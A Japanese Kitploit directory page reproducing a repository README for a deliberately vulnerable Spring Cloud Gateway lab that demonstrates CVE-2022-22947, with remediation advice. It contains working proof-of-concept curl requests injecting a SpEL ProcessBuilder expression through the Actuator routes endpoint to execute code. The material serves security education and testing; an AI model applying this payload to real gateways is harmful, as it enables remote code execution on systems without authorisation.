Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22947-pb-ai — AIによって生成された脆弱性検証アプリケーション | Kitploit
ツール/GitHubGitHub/skysliently/cve-2022-22947-pb-ai
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用APIセキュリティテスト学習と教育
GitHubskysliently/cve-2022-22947-pb-ai

CVE-2022-22947-pb-ai

AIによって生成された脆弱性検証アプリケーション

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-22947 Spring Cloud Gateway 脆弱性検証アプリケーション

これは CVE-2022-22947 脆弱性をデモおよび検証するための Spring Cloud Gateway アプリケーションです。このアプリケーションは脆弱なバージョンの Spring Cloud Gateway を使用しており、Actuator エンドポイントを介して任意のコードを実行できます。

脆弱性概要

CVE-2022-22947 は Spring Cloud Gateway におけるリモートコード実行脆弱性です。攻撃者は Actuator エンドポイントを介して悪意のある SpEL 式を含むルートを動的に追加し、任意のコードを実行できます。

環境要件

  • Java 11+
  • Maven 3.6+
  • macOS システム(電卓デモ用)

アプリケーションの起動

root@kitploit:~
mvn spring-boot:run

アプリケーションは http://localhost:8080 で起動します。

脆弱性検証手順

ステップ1:悪意のあるルートの追加

/actuator/gateway/routes/test エンドポイントに POST リクエストを送信し、悪意のある SpEL 式を含むルートを追加します:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'

ステップ2:ルートのリフレッシュ

/actuator/gateway/refresh エンドポイントに POST リクエストを送信してルートをリフレッシュします:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/refresh

ステップ3:悪意のあるコードのトリガー

悪意のあるルートにアクセスしてコード実行をトリガーします:

root@kitploit:~
curl http://localhost:8080/test

期待される結果

脆弱性を悪用すると、macOS の電卓アプリケーションが起動します。

重要なリクエスト情報

1. 悪意のあるルート追加リクエスト

エンドポイント: POST /actuator/gateway/routes/test

リクエストヘッダー:

root@kitploit:~
Content-Type: application/json

リクエストボディ:

root@kitploit:~
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}

2. ルートリフレッシュリクエスト

エンドポイント: POST /actuator/gateway/refresh

3. 脆弱性トリガーリクエスト

エンドポイント: GET /test

脆弱性分析

この脆弱性により、攻撃者は Actuator エンドポイントを介してルートを動的に追加し、ルートフィルターで SpEL 式を使用して任意のコードを実行できます。脆弱性の核心は、Spring Cloud Gateway がルート設定内の SpEL 式を適切に処理しないことです。

修正推奨事項

  1. Spring Cloud Gateway 3.1.1+ または 3.0.7+ にアップグレードする
  2. Actuator エンドポイントを無効にするか、アクセスを制限する
  3. Spring Security を使用して Actuator エンドポイントを保護する

バージョン情報

  • Spring Boot: 2.6.2
  • Spring Cloud: 2021.0.0
  • Spring Cloud Gateway: 3.1.0 (脆弱なバージョン)

注意事項

⚠️ セキュリティ警告: このアプリケーションは教育およびセキュリティ研究目的のみに使用されます。本番環境で使用またはデプロイしないでください。

⚠️ 法的声明: このアプリケーションを使用して脆弱性テストを行う場合は、適切な権限があることを確認してください。無許可のテストは法律に違反する可能性があります。

ツールをダウンロード